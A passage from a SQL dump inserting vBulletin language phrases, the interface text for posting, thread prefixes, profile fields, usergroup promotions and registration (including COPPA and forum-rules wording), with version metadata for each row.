(36944, -1, 'post_new_thread', 'posting', 'Post New Thread', 'vbulletin', '', 0, ''),
(36945, -1, 'posting_message_please_wait', 'posting', 'Posting Message - Please Wait', 'vbulletin', 'vBulletin Solutions', 1144708590, '3.6.0 Beta 1'),
(36946, -1, 'preview', 'posting', 'Preview', 'vbulletin', '', 0, ''),
(36947, -1, 'preview_changes', 'posting', 'Preview Changes', 'vbulletin', '', 0, ''),
(36948, -1, 'preview_message', 'posting', 'Preview Message', 'vbulletin', 'vBulletin Solutions', 1196728227, '3.7.0 Beta 1'),
(36949, -1, 'preview_post', 'posting', 'Preview Post', 'vbulletin', '', 0, ''),
(36950, -1, 'quick_reply', 'posting', 'Quick Reply', 'vbulletin', 'vBulletin Solutions', 1203089685, '3.7.0 Beta 6'),
(36951, -1, 'reason_for_deletion', 'posting', 'Reason for Deletion', 'vbulletin', '', 0, ''),
(36952, -1, 'reason_for_editing', 'posting', 'Reason for Editing', 'vbulletin', '', 0, ''),
(36953, -1, 'redo', 'posting', 'Redo', 'vbulletin', '', 0, ''),
(36954, -1, 'remove_link', 'posting', 'Remove Link', 'vbulletin', '', 0, ''),
(36955, -1, 'remove_text_formatting', 'posting', 'Remove Text Formatting', 'vbulletin', '', 0, ''),
(36956, -1, 'reopen_this_thread', 'posting', 'Re-open this thread after you submit your message', 'vbulletin', '', 0, ''),
(36957, -1, 'reply_to_thread', 'posting', 'Reply to Thread', 'vbulletin', '', 0, ''),
(36958, -1, 'reply_to_topic', 'posting', 'Reply to Topic', 'vbulletin', '', 0, ''),
(36959, -1, 'reset_views_counter', 'posting', 'Reset Views Counter to Zero', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36960, -1, 'select_a_file_to_attach', 'posting', 'Please select a file to attach.', 'vbulletin', '', 0, ''),
(36961, -1, 'selected_1_post_not_part_thread', 'posting', 'You have selected 1 post that is not part of this thread. Quote this post as well , or deselect this post .', 'vbulletin', 'vBulletin Solutions', 1148659367, '3.6.0 Beta 1'),
(36962, -1, 'selected_x_posts_not_part_thread', 'posting', 'You have selected {1} posts that are not part of this thread. Quote these posts as well , or deselect these posts .', 'vbulletin', 'vBulletin Solutions', 1208426590, '3.7.0 Release Candidate 4'),
(36963, -1, 'separate_tags_using_comma', 'posting', 'Separate tags using a comma.', 'vbulletin', 'vBulletin Solutions', 1190903991, '3.7.0 Beta 1'),
(36964, -1, 'show_all_smilies', 'posting', 'Show all Smilies', 'vbulletin', '', 0, ''),
(36965, -1, 'show_your_signature', 'posting', 'Show your signature', 'vbulletin', '', 0, ''),
(36966, -1, 'sizes', 'posting', 'Sizes', 'vbulletin', '', 0, ''),
(36967, -1, 'stick_this_thread', 'posting', 'Stick this thread after you submit your message', 'vbulletin', '', 0, ''),
(36968, -1, 'stuck', 'posting', 'Stuck', 'vbulletin', '', 0, ''),
(36969, -1, 'submit_message', 'posting', 'Submit Message', 'vbulletin', '', 0, ''),
(36970, -1, 'submit_new_thread', 'posting', 'Submit New Thread', 'vbulletin', '', 0, ''),
(36971, -1, 'submit_reply', 'posting', 'Submit Reply', 'vbulletin', '', 0, ''),
(36972, -1, 'subtitle', 'posting', 'Subtitle', 'vbulletin', 'vBulletin Solutions', 1156883825, '3.6.1'),
(36973, -1, 'switch_editor_mode', 'posting', 'Switch Editor Mode', 'vbulletin', '', 0, ''),
(36974, -1, 'tag_management', 'posting', 'Tag Management', 'vbulletin', 'vBulletin Solutions', 1190904587, '3.7.0 Beta 1'),
(36975, -1, 'tags_visible_all_users', 'posting', 'Tags will be visible to all users.', 'vbulletin', 'vBulletin Solutions', 1197975228, '3.7.0 Beta 3'),
(36976, -1, 'terrible', 'posting', 'Terrible', 'vbulletin', '', 0, ''),
(36977, -1, 'text_changes', 'posting', 'Text Changes', 'vbulletin', 'vBulletin Solutions', 1194539236, '3.7.0 Beta 1'),
(36978, -1, 'this_forum_is_not_accepting_new_attachments', 'posting', 'This forum is not accepting new attachments', 'vbulletin', '', 0, ''),
(36979, -1, 'this_user_on_your_ignore_list', 'posting', 'This user is on your Ignore List .', 'vbulletin', '', 0, ''),
(36980, -1, 'thread_has_more_than_x_review', 'posting', 'This thread has more than {1} replies.\r\nClick here to review the whole thread.', 'vbulletin', '', 0, ''),
(36981, -1, 'thread_management', 'posting', 'Thread Management', 'vbulletin', '', 0, ''),
(36982, -1, 'thread_subscription', 'posting', 'Thread Subscription', 'vbulletin', '', 0, ''),
(36983, -1, 'time_of_edit', 'posting', 'Time of Edit', 'vbulletin', 'vBulletin Solutions', 1191498409, '3.7.0 Beta 1'),
(36984, -1, 'title_changes', 'posting', 'Title Changes', 'vbulletin', 'vBulletin Solutions', 1194539229, '3.7.0 Beta 1'),
(36985, -1, 'topic_review_newest_first', 'posting', 'Topic Review (Newest First) ', 'vbulletin', '', 0, ''),
(36986, -1, 'uncheck_tag_remove_bold_you', 'posting', 'Uncheck a tag to remove it from this thread. Tags in bold were added by you.', 'vbulletin', 'vBulletin Solutions', 1196431681, '3.7.0 Beta 1'),
(36987, -1, 'underline', 'posting', 'Underline', 'vbulletin', '', 0, ''),
(36988, -1, 'undo', 'posting', 'Undo', 'vbulletin', '', 0, ''),
(36989, -1, 'unordered_list', 'posting', 'Unordered List', 'vbulletin', '', 0, ''),
(36990, -1, 'unstick_this_thread', 'posting', 'Un-stick this thread after you submit your message', 'vbulletin', '', 0, ''),
(36991, -1, 'upload_file', 'posting', 'Upload File', 'vbulletin', '', 0, ''),
(36992, -1, 'upload_file_from_url', 'posting', 'Upload File from a URL', 'vbulletin', 'vBulletin Solutions', 1150741358, '3.6.0 Beta 3'),
(36993, -1, 'upload_file_from_your_computer', 'posting', 'Upload File from your Computer', 'vbulletin', '', 0, ''),
(36994, -1, 'uploading_file', 'posting', 'Uploading File(s) - Please Wait', 'vbulletin', '', 0, ''),
(36995, -1, 'wrap_code_tags', 'posting', 'Wrap [CODE] tags around selected text', 'vbulletin', '', 0, ''),
(36996, -1, 'wrap_html_tags', 'posting', 'Wrap [HTML] tags around selected text', 'vbulletin', '', 0, ''),
(36997, -1, 'wrap_php_tags', 'posting', 'Wrap [PHP] tags around selected text', 'vbulletin', '', 0, ''),
(36998, -1, 'wrap_quote_tags', 'posting', 'Wrap [QUOTE] tags around selected text', 'vbulletin', '', 0, ''),
(36999, -1, 'wrap_x_tags', 'posting', 'Wrap [{1}] tags around selected text', 'vbulletin', '', 0, ''),
(37000, -1, 'wysiwyg_command_invalid', 'posting', 'This command is invalid or not implemented.', 'vbulletin', '', 0, ''),
(37001, -1, 'wysiwyg_initialized', 'posting', 'WYSIWYG Editor initialized for {1} in {2} seconds.', 'vbulletin', '', 0, ''),
(37002, -1, 'wysiwyg_please_wait', 'posting', 'Please wait for the WYSIWYG editor to finish loading...', 'vbulletin', '', 0, ''),
(37003, -1, 'yes_post_a_poll_thread', 'posting', 'Yes, post a poll with this thread', 'vbulletin', '', 0, ''),
(37004, -1, 'you_may_add_x_tags_to_thread', 'posting', 'You may add {1} tag(s) to this thread.', 'vbulletin', 'vBulletin Solutions', 1196431479, '3.7.0 Beta 1'),
(37005, -1, 'any_prefix_meta', 'prefix', '(any prefix)', 'vbulletin', 'vBulletin Solutions', 1190041853, '3.7.0 Beta 1'),
(37006, -1, 'no_prefix_meta', 'prefix', '(no prefix)', 'vbulletin', 'vBulletin Solutions', 1189609622, '3.7.0 Beta 1'),
(37007, -1, 'prefix', 'prefix', 'Prefix', 'vbulletin', 'vBulletin Solutions', 1190041938, '3.7.0 Beta 1'),
(37008, -1, 'add_prefix', 'prefixadmin', 'Add Prefix', 'vbulletin', 'vBulletin Solutions', 1190043041, '3.7.0 Beta 1'),
(37009, -1, 'add_prefix_set', 'prefixadmin', 'Add Prefix Set', 'vbulletin', 'vBulletin Solutions', 1190043041, '3.7.0 Beta 1'),
(37010, -1, 'adding_prefix', 'prefixadmin', 'Adding Prefix', 'vbulletin', 'vBulletin Solutions', 1190043041, '3.7.0 Beta 1'),
(37011, -1, 'adding_prefix_set', 'prefixadmin', 'Adding Prefix Set', 'vbulletin', 'vBulletin Solutions', 1190043041, '3.7.0 Beta 1'),
(37012, -1, 'allow_new_groups_to_use_selected_prefixes', 'prefixadmin', 'Allow Newly Created Usergroups To Use The Selected Prefixes', 'vbulletin', 'vBulletin Solutions', 1213891270, '3.8.0 Alpha 1'),
(37013, -1, 'are_you_sure_want_to_delete_prefix_x', 'prefixadmin', 'Are you sure you want to delete the prefix called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1190042495, '3.7.0 Beta 1'),
(37014, -1, 'are_you_sure_want_to_delete_prefixset_x', 'prefixadmin', 'Are you sure you want to delete the prefix set called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1190042502, '3.7.0 Beta 1'),
(37015, -1, 'copy_permissions_from', 'prefixadmin', 'Copy Permissions From', 'vbulletin', 'vBulletin Solutions', 1213891295, '3.8.0 Alpha 1'),
(37016, -1, 'copy_permissions_to', 'prefixadmin', 'Copy Permissions To', 'vbulletin', 'vBulletin Solutions', 1213891318, '3.8.0 Alpha 1'),
(37017, -1, 'deny_permission_for_selected_prefixes', 'prefixadmin', 'Deny Permission For All Selected Prefixes', 'vbulletin', 'vBulletin Solutions', 1213891336, '3.8.0 Alpha 1'),
(37018, -1, 'do_not_resolve_permission_conflict', 'prefixadmin', 'Do Not Resolve Permission Conflict', 'vbulletin', 'vBulletin Solutions', 1213891363, '3.8.0 Alpha 1'),
(37019, -1, 'edit_selected_prefix_permissions', 'prefixadmin', 'Edit Selected Prefix Permissions', 'vbulletin', 'vBulletin Solutions', 1213891383, '3.8.0 Alpha 1'),
(37020, -1, 'edit_thread_prefix_permissions', 'prefixadmin', 'Edit Thread Prefix Permissions', 'vbulletin', 'vBulletin Solutions', 1213891403, '3.8.0 Alpha 1'),
(37021, -1, 'editing_permissions_for_x', 'prefixadmin', 'Editing permissions for {1}', 'vbulletin', 'vBulletin Solutions', 1213891423, '3.8.0 Alpha 1'),
(37022, -1, 'editing_prefix', 'prefixadmin', 'Editing Prefix', 'vbulletin', 'vBulletin Solutions', 1190043041, '3.7.0 Beta 1'),
(37023, -1, 'editing_prefix_set', 'prefixadmin', 'Editing Prefix Set', 'vbulletin', 'vBulletin Solutions', 1190043041, '3.7.0 Beta 1'),
(37024, -1, 'grant_permission_for_selected_prefixes', 'prefixadmin', 'Grant Permission For All Selected Prefixes', 'vbulletin', 'vBulletin Solutions', 1213891443, '3.8.0 Alpha 1'),
(37025, -1, 'leave_default_permissions_unchanged', 'prefixadmin', 'Leave Default Permissions Unchanged', 'vbulletin', 'vBulletin Solutions', 1213891464, '3.8.0 Alpha 1'),
(37026, -1, 'new_groups_may_not_use_selected_prefixes', 'prefixadmin', 'New Groups May Not Use Selected Prefixes', 'vbulletin', 'vBulletin Solutions', 1213891479, '3.8.0 Alpha 1'),
(37027, -1, 'new_groups_may_use_selected_prefixes', 'prefixadmin', 'New Groups May Use Selected Prefixes', 'vbulletin', 'vBulletin Solutions', 1213891503, '3.8.0 Alpha 1'),
(37028, -1, 'no_prefix_sets_defined_click_create', 'prefixadmin', 'There are no prefix sets defined. To create a prefix, you must first create a prefix set. Click here to create a set!', 'vbulletin', 'vBulletin Solutions', 1190043266, '3.7.0 Beta 1'),
(37029, -1, 'no_prefixes_defined_click_create', 'prefixadmin', 'No prefixes defined for this set. Click here to create a prefix!', 'vbulletin', 'vBulletin Solutions', 1190043266, '3.7.0 Beta 1'),
(37030, -1, 'overwrite_customized_permissions_no_restrictions', 'prefixadmin', 'Overwrite Customized Permissions\r\nIf you select no, only target prefixes with no restrictions will be updated. Selecting yes will update all target prefixes. ', 'vbulletin', 'vBulletin Solutions', 1216748324, '3.8.0 Alpha 1'),
(37031, -1, 'prefix_id_alphanumeric_note', 'prefixadmin', 'Prefix ID\r\nA-Z, a-z, 0-9, and _ (underscore) only ', 'vbulletin', 'vBulletin Solutions', 1210067235, '3.7.1'),
(37032, -1, 'prefix_set', 'prefixadmin', 'Prefix Set', 'vbulletin', 'vBulletin Solutions', 1190043041, '3.7.0 Beta 1'),
(37033, -1, 'prefix_set_id_alphanumeric_note', 'prefixadmin', 'Prefix Set ID\r\nA-Z, a-z, 0-9, and _ (underscore) only ', 'vbulletin', 'vBulletin Solutions', 1210067249, '3.7.1'),
(37034, -1, 'resolve_permission_conflict', 'prefixadmin', 'Resolve Permission Conflict', 'vbulletin', 'vBulletin Solutions', 1213891546, '3.8.0 Alpha 1'),
(37035, -1, 'set_default_permissions', 'prefixadmin', 'Set Default Permissions', 'vbulletin', 'vBulletin Solutions', 1213891565, '3.8.0 Alpha 1'),
(37036, -1, 'thread_prefix_manager', 'prefixadmin', 'Thread Prefix Manager', 'vbulletin', 'vBulletin Solutions', 1190042876, '3.7.0 Beta 1'),
(37037, -1, 'thread_prefixes', 'prefixadmin', 'Thread Prefixes', 'vbulletin', 'vBulletin Solutions', 1190043041, '3.7.0 Beta 1'),
(37038, -1, 'title_plain_text', 'prefixadmin', 'Title (Plain Text)', 'vbulletin', 'vBulletin Solutions', 1190043041, '3.7.0 Beta 1'),
(37039, -1, 'title_rich_text', 'prefixadmin', 'Title (Rich Text)', 'vbulletin', 'vBulletin Solutions', 1190043041, '3.7.0 Beta 1'),
(37040, -1, 'use_prefix_set_in_these_forums', 'prefixadmin', 'Use Prefix Set in These Forums', 'vbulletin', 'vBulletin Solutions', 1190047777, '3.7.0 Beta 1'),
(37041, -1, 'add_new_option', 'profilefield', 'Add New Option', 'vbulletin', '', 0, ''),
(37042, -1, 'add_new_profile_field_category', 'profilefield', 'Add New Profile Field Category', 'vbulletin', 'vBulletin Solutions', 1176909569, '3.6.6'),
(37043, -1, 'add_new_user_profile_field', 'profilefield', 'Add New User Profile Field', 'vbulletin', '', 0, ''),
(37044, -1, 'after_x', 'profilefield', 'After \'{1}\'', 'vbulletin', '', 0, ''),
(37045, -1, 'allow_user_to_input_their_own_value_for_this_option', 'profilefield', 'Allow user to input their own value for this option', 'vbulletin', '', 0, ''),
(37046, -1, 'are_you_sure_you_want_to_delete_this_user_profile_field', 'profilefield', 'Are you sure you want to delete this User Profile Field?', 'vbulletin', '', 0, ''),
(37047, -1, 'are_you_sure_you_want_to_delete_user_profile_field_category_x', 'profilefield', 'Are you sure you want to delete this user profile field category?\r\n\r\n {1} \r\n (Contains {2} Profile Fields)
\r\n \r\nAny profile fields belonging to this category will become {3} but will not be deleted.', 'vbulletin', 'vBulletin Solutions', 1176908567, '3.6.6'),
(37048, -1, 'blocks_column_after_albums', 'profilefield', 'Blocks Column, After Albums', 'vbulletin', 'vBulletin Solutions', 1193677939, '3.7.0 Beta 1'),
(37049, -1, 'blocks_column_after_mini_stats', 'profilefield', 'Blocks Column, After Mini Stats', 'vbulletin', 'vBulletin Solutions', 1193677923, '3.7.0 Beta 1'),
(37050, -1, 'blocks_column_first', 'profilefield', 'Blocks Column, First', 'vbulletin', 'vBulletin Solutions', 1193677906, '3.7.0 Beta 1'),
(37051, -1, 'blocks_column_last', 'profilefield', 'Blocks Column, Last', 'vbulletin', 'vBulletin Solutions', 1193677953, '3.7.0 Beta 1'),
(37052, -1, 'box_height', 'profilefield', 'Box HeightNumber of options to display simultaneously. 0 will display them all. ', 'vbulletin', '', 0, ''),
(37053, -1, 'choose_limit_choices_add_info', 'profilefield', 'If you choose to limit the number of choices in the next option, please add that information to the description.', 'vbulletin', '', 0, ''),
(37054, -1, 'contains_x_fields', 'profilefield', 'Contains {1} Fields', 'vbulletin', 'vBulletin Solutions', 1176908546, '3.6.6'),
(37055, -1, 'default_value_you_may_specify_a_default_registration_value', 'profilefield', 'Default ValueYou may specify a default value that is entered into this field at the time of registration. ', 'vbulletin', '', 0, ''),
(37056, -1, 'display_page', 'profilefield', 'Display Page', 'vbulletin', '', 0, ''),
(37057, -1, 'edit_user_profile_field_category', 'profilefield', 'Edit User Profile Field Category', 'vbulletin', 'vBulletin Solutions', 1176908531, '3.6.6'),
(37058, -1, 'editable', 'profilefield', 'Editable', 'vbulletin', '', 0, ''),
(37059, -1, 'field_editable_by_user', 'profilefield', 'Field Editable by User', 'vbulletin', '', 0, ''),
(37060, -1, 'field_hidden_on_profile', 'profilefield', 'Private Field', 'vbulletin', '', 0, ''),
(37061, -1, 'field_length', 'profilefield', 'Field Length', 'vbulletin', 'vBulletin Solutions', 1147797010, '3.6.0 Beta 1'),
(37062, -1, 'field_searchable_on_members_list', 'profilefield', 'Field Searchable on Members List', 'vbulletin', '', 0, ''),
(37063, -1, 'fields', 'profilefield', 'Fields', 'vbulletin', '', 0, ''),
(37064, -1, 'fields_from_form_x', 'profilefield', 'Profile Fields from Form \'{1} \'', 'vbulletin', 'vBulletin Solutions', 1202827399, '3.7.0 Beta 5'),
(37065, -1, 'hidden', 'profilefield', 'Hidden', 'vbulletin', '', 0, ''),
(37066, -1, 'items_per_line', 'profilefield', 'Items Per LineInput 0 to display all of the controls on the same line. ', 'vbulletin', 'vBulletin Solutions', 1199998605, '3.7.0 Beta 4'),
(37067, -1, 'limit_selection', 'profilefield', 'Limit SelectionMaximum number of options the user may select. Enter 0 to allow them to choose all of the options. ', 'vbulletin', '', 0, ''),
(37068, -1, 'location_on_profile_page_dfn', 'profilefield', 'Location on Profile Page\r\nProfile fields will always be shown on the \'About Me\' tab, in addition to any location you select here. ', 'vbulletin', 'vBulletin Solutions', 1193678008, '3.7.0 Beta 1'),
(37069, -1, 'main_column_first_tab', 'profilefield', 'Main Column, First Tab', 'vbulletin', 'vBulletin Solutions', 1193677878, '3.7.0 Beta 1'),
(37070, -1, 'main_column_last_tab', 'profilefield', 'Main Column, Last Tab', 'vbulletin', 'vBulletin Solutions', 1193677892, '3.7.0 Beta 1'),
(37071, -1, 'messaging', 'profilefield', 'Messaging', 'vbulletin', '', 0, ''),
(37072, -1, 'multiple_line_text_box', 'profilefield', 'Multiple-Line Text Box', 'vbulletin', '', 0, ''),
(37073, -1, 'multiple_selection_checkbox', 'profilefield', 'Multiple-Selection Checkbox', 'vbulletin', '', 0, ''),
(37074, -1, 'multiple_selection_menu', 'profilefield', 'Multiple-Selection Menu', 'vbulletin', '', 0, ''),
(37075, -1, 'name', 'profilefield', 'Name', 'vbulletin', '', 0, ''),
(37076, -1, 'no_but_on_register', 'profilefield', 'No, but display at registration', 'vbulletin', '', 0, '');
INSERT INTO `phrase` (`phraseid`, `languageid`, `varname`, `fieldname`, `text`, `product`, `username`, `dateline`, `version`) VALUES
(37077, -1, 'no_user_profile_field_categories_have_been_created', 'profilefield', 'No user profile field categories have been created. \r\n \r\nClick the link below to create a new category.', 'vbulletin', 'vBulletin Solutions', 1176908658, '3.6.6'),
(37078, -1, 'note_max_31_options', 'profilefield', 'Note: You may have a maximum of 31 options in this field.', 'vbulletin', 'vBulletin Solutions', 1204733531, '3.7.0 Beta 6'),
(37079, -1, 'only_at_registration', 'profilefield', 'Only at registration', 'vbulletin', '', 0, ''),
(37080, -1, 'only_in_about_me_tab', 'profilefield', 'Only in the \'About Me\' Tab', 'vbulletin', 'vBulletin Solutions', 1193677848, '3.7.0 Beta 1'),
(37081, -1, 'optional_input', 'profilefield', 'Optional Input', 'vbulletin', '', 0, ''),
(37082, -1, 'other', 'profilefield', 'Other', 'vbulletin', '', 0, ''),
(37083, -1, 'other_please_specify', 'profilefield', 'Other (please specify)', 'vbulletin', '', 0, ''),
(37084, -1, 'postition', 'profilefield', 'Position', 'vbulletin', '', 0, ''),
(37085, -1, 'privacy', 'profilefield', 'Privacy', 'vbulletin', '', 0, ''),
(37086, -1, 'profile_field_category', 'profilefield', 'Profile Field Category', 'vbulletin', 'vBulletin Solutions', 1176908600, '3.6.6'),
(37087, -1, 'profile_field_type', 'profilefield', 'Profile Field Type', 'vbulletin', '', 0, ''),
(37088, -1, 'regular_expression_require_match', 'profilefield', 'Regular ExpressionYou may require the input field to match a regular expression (PCRE ). ', 'vbulletin', 'vBulletin Solutions', 1190377582, '3.7.0 Beta 1'),
(37089, -1, 'rename', 'profilefield', 'Rename', 'vbulletin', '', 0, ''),
(37090, -1, 'required', 'profilefield', 'Required', 'vbulletin', '', 0, ''),
(37091, -1, 'searchable', 'profilefield', 'Searchable', 'vbulletin', '', 0, ''),
(37092, -1, 'set_default_if_yes_first', 'profilefield', 'Set Default Will set the first non blank option as the default. ', 'vbulletin', 'vBulletin Solutions', 1157746464, '3.6.1'),
(37093, -1, 'show_on_members_list', 'profilefield', 'Show on Members List', 'vbulletin', '', 0, ''),
(37094, -1, 'single_line_text_box', 'profilefield', 'Single-Line Text Box', 'vbulletin', '', 0, ''),
(37095, -1, 'single_selection_menu', 'profilefield', 'Single-Selection Menu', 'vbulletin', '', 0, ''),
(37096, -1, 'single_selection_radio_buttons', 'profilefield', 'Single-Selection Radio Buttons', 'vbulletin', '', 0, ''),
(37097, -1, 'text_area_height', 'profilefield', 'Text Area Height', 'vbulletin', '', 0, ''),
(37098, -1, 'this_profile_fields_no_options', 'profilefield', 'This user profile field has no options.', 'vbulletin', '', 0, ''),
(37099, -1, 'thread_viewing', 'profilefield', 'Thread Viewing', 'vbulletin', '', 0, ''),
(37100, -1, 'uncategorized', 'profilefield', 'Uncategorized', 'vbulletin', 'vBulletin Solutions', 1176908208, '3.6.6'),
(37101, -1, 'user_profile_field_categories', 'profilefield', 'User Profile Field Categories', 'vbulletin', 'vBulletin Solutions', 1176908614, '3.6.6'),
(37102, -1, 'user_profile_field_manager', 'profilefield', 'User Profile Field Manager', 'vbulletin', '', 0, ''),
(37103, -1, 'user_profile_fields_in_area_x', 'profilefield', 'User Profile Fields in Area: {1} ', 'vbulletin', '', 0, ''),
(37104, -1, 'which_page_displays_option', 'profilefield', 'Which page displays this option?If you select \"Edit Your Details\", this option will show up when viewing a user\'s profile. All other options are primarily used in conjunction with template conditionals to create additional options for your users. ', 'vbulletin', 'vBulletin Solutions', 1201688546, '3.7.0 Beta 5'),
(37105, -1, 'yes_always', 'profilefield', 'Yes, Always', 'vbulletin', 'vBulletin Solutions', 1147712780, '3.6.0 Beta 1'),
(37106, -1, 'yes_at_registration', 'profilefield', 'Yes, at registration and profile updating', 'vbulletin', 'vBulletin Solutions', 1147712757, '3.6.0 Beta 1'),
(37107, -1, 'yes_but_no_blank_option', 'profilefield', 'Yes, but No First Blank Option', 'vbulletin', '', 0, ''),
(37108, -1, 'yes_including_a_blank', 'profilefield', 'Yes, Including a First Blank Option', 'vbulletin', '', 0, ''),
(37109, -1, 'you_close_before_modifying_checkboxes', 'profilefield', 'You should close your forum before modifying checkbox fields.', 'vbulletin', '', 0, ''),
(37110, -1, 'add_new_promotion', 'promotion', 'Add New Promotion', 'vbulletin', '', 0, ''),
(37111, -1, 'edit_promotions', 'promotion', 'Edit Promotions', 'vbulletin', '', 0, ''),
(37112, -1, 'greater_or_equal_to', 'promotion', 'Greater or Equal to', 'vbulletin', '', 0, ''),
(37113, -1, 'less_than', 'promotion', 'Less Than', 'vbulletin', '', 0, ''),
(37114, -1, 'move_user_to_usergroup', 'promotion', 'Move User to Usergroup', 'vbulletin', '', 0, ''),
(37115, -1, 'move_user_to_usergroup_description', 'promotion', 'Jumping is evaluated based on the time period defined in the Scheduled Tasks section (Default: Every 1 Hour)', 'vbulletin', '', 0, ''),
(37116, -1, 'promotion_strategy', 'promotion', 'Promotion Strategy', 'vbulletin', '', 0, ''),
(37117, -1, 'promotion_strategy1', 'promotion', 'Posts and Reputation and Date', 'vbulletin', '', 0, ''),
(37118, -1, 'promotion_strategy2', 'promotion', 'Posts or Reputation or Date', 'vbulletin', '', 0, ''),
(37119, -1, 'promotion_strategy3', 'promotion', '(Posts and Reputation) or Date', 'vbulletin', '', 0, ''),
(37120, -1, 'promotion_strategy4', 'promotion', 'Posts and (Reputation or Date)', 'vbulletin', '', 0, ''),
(37121, -1, 'promotion_strategy5', 'promotion', '(Posts or Reputation) and Date', 'vbulletin', '', 0, ''),
(37122, -1, 'promotion_strategy6', 'promotion', 'Posts or (Reputation and Date)', 'vbulletin', '', 0, ''),
(37123, -1, 'promotion_strategy7', 'promotion', 'Reputation and (Posts or Date)', 'vbulletin', '', 0, ''),
(37124, -1, 'promotion_strategy8', 'promotion', 'Reputation or (Posts and Date)', 'vbulletin', '', 0, ''),
(37125, -1, 'promotion_strategy_description', 'promotion', 'Choose the way that you wish the above values to be evaluated', 'vbulletin', '', 0, ''),
(37126, -1, 'promotion_type', 'promotion', 'Promotion Type', 'vbulletin', '', 0, ''),
(37127, -1, 'promotion_type_description_primary_additional', 'promotion', 'Type of promotion that the user is to receive. Select \'Primary Usergroup \' to change the user\'s main usergroup to this group or select \'Additional Usergroups \' to add this group to the user\'s additional usergroups', 'vbulletin', '', 0, ''),
(37128, -1, 'reputation_comparison_type', 'promotion', 'Reputation Comparison Type', 'vbulletin', '', 0, ''),
(37129, -1, 'reputation_comparison_type_desc', 'promotion', 'This option only applies to reputation and only when reputation has been selected as part of the Promotion Strategy above.', 'vbulletin', 'vBulletin Solutions', 1199738300, '3.7.0 Beta 4'),
(37130, -1, 'additional_required_information_option', 'register', 'Additional Required Information (option)', 'vbulletin', '', 0, ''),
(37131, -1, 'additional_required_information_profile', 'register', 'Additional Required Information (profile)', 'vbulletin', '', 0, ''),
(37132, -1, 'complete_registration', 'register', 'Complete Registration', 'vbulletin', '', 0, ''),
(37133, -1, 'confirm_email_address', 'register', 'Confirm Email Address', 'vbulletin', '', 0, ''),
(37134, -1, 'confirm_password', 'register', 'Confirm Password', 'vbulletin', '', 0, ''),
(37135, -1, 'contact_webmaster_questions', 'register', 'Please contact the webmaster with any questions', 'vbulletin', '', 0, ''),
(37136, -1, 'coppa', 'register', 'COPPA', 'vbulletin', '', 0, ''),
(37137, -1, 'coppa_policy', 'register', 'COPPA Policy', 'vbulletin', '', 0, ''),
(37138, -1, 'coppa_rules', 'register', 'COPPA Rules', 'vbulletin', '', 0, ''),
(37139, -1, 'coppa_rules_description', 'register', ' All users under the age of 13 must seek permission from their parent or guardian\r\nin order to gain membership of the {1} forums.\r\nWhile we welcome participation from members under 13,\r\nwe require that a parent or guardian fax or mail back a signed permission form before we grant membership.
\r\n\r\nIf you would like to start the registration process prior to us receiving a permission form,\r\ncheck the \'I agree\' checkbox and press the \'Register\' button below. If you would like to cancel the registration,\r\nclick here to return to the forums index.
\r\n\r\nA copy of the permission form can be downloaded here .
\r\n\r\nFor more information about the registration process, or the {1} forums in general,\r\nplease send email to {4} .
', 'vbulletin', '', 0, ''),
(37140, -1, 'enter_valid_email_address', 'register', 'Please enter a valid email address for yourself.', 'vbulletin', '', 0, ''),
(37141, -1, 'entered_passwords_do_not_match', 'register', 'The entered passwords do not match.', 'vbulletin', '', 0, ''),
(37142, -1, 'errors_occurred_during_registration', 'register', 'The following errors occurred during your registration', 'vbulletin', '', 0, ''),
(37143, -1, 'fill_out_both_password_fields', 'register', 'Please fill out both password fields.', 'vbulletin', '', 0, ''),
(37144, -1, 'forum_rules', 'register', 'Forum Rules', 'vbulletin', '', 0, ''),
(37145, -1, 'forum_rules_description', 'register', 'Although the administrators and moderators of {2} will attempt to keep all objectionable\r\nmessages off this forum, it is impossible for us to review all messages. All messages express the views of\r\nthe author, and neither the owners of {2}, nor vBulletin Solutions, Inc. (developers of vBulletin)\r\nwill be held responsible for the content of any message.
\r\n\r\nBy agreeing to these rules, you warrant that you will not post any messages that are obscene, vulgar,\r\nsexually-oriented, hateful, threatening, or otherwise violative of any laws.
\r\n\r\nThe owners of {2} reserve the right to remove, edit, move or close any thread for any reason.
', 'vbulletin', 'vBulletin Solutions', 1220350279, '3.8.0 Alpha 1'),
(37146, -1, 'forum_rules_registration', 'register', 'Forum Rules
\r\n\r\nRegistration to this forum is free! We do insist that you abide by the rules and policies detailed\r\nbelow. If you agree to the terms, please check the \'I agree\' checkbox and press the \'Register\' button below.\r\nIf you would like to cancel the registration, click here \r\nto return to the forums index.
', 'vbulletin', 'vBulletin Solutions', 1220350261, '3.8.0 Alpha 1'),
(37147, -1, 'if_referred_enter_name', 'register', 'If you were referred to this site by an existing member of {1}, enter their username here.', 'vbulletin', 'vBulletin Solutions', 1207929495, '3.7.0 Release Candidate 4'),
(37148, -1, 'instructions_for_parent_guardian', 'register', 'Instructions for a Parent or Guardian \r\n Please print out this page, sign it and fax it to: \r\n {1} at {2} \r\n Or mail it to: \r\n {3} \r\n If approval is not received in 7 days the information will be deleted.', 'vbulletin', '', 0, ''),
(37149, -1, 'make_changes_profile_visit', 'register', 'To make changes to the profile information below, please visit this page and enter the username and password', 'vbulletin', '', 0, ''),
(37150, -1, 'optional_information', 'register', 'Optional Information', 'vbulletin', '', 0, ''),
(37151, -1, 'parent_guardian_full_name', 'register', 'Parent / Guardian Full Name', 'vbulletin', '', 0, ''),
(37152, -1, 'parent_signature', 'register', 'Signature', 'vbulletin', 'vBulletin Solutions', 1198786806, '3.7.0 Beta 4'),
(37153, -1, 'parental_permission_required', 'register', 'Parental Permission Required', 'vbulletin', 'vBulletin Solutions', 1198786784, '3.7.0 Beta 4'),
(37154, -1, 'permission_to_participate_at_x', 'register', 'Permission to Participate at {1}', 'vbulletin', '', 0, ''),
(37155, -1, 'please_enter_a_proper_year', 'register', 'Please enter a proper year', 'vbulletin', '', 0, ''),
(37156, -1, 'please_enter_your_date_of_birth', 'register', 'Please Enter Your Date of Birth', 'vbulletin', '', 0, ''),
(37157, -1, 'privacy_mode', 'register', 'Privacy Mode', 'vbulletin', '', 0, ''),
(37158, -1, 'read_agree_abide_by_rules', 'register', 'I have read, and agree to abide by the {1} rules.', 'vbulletin', '', 0, ''),
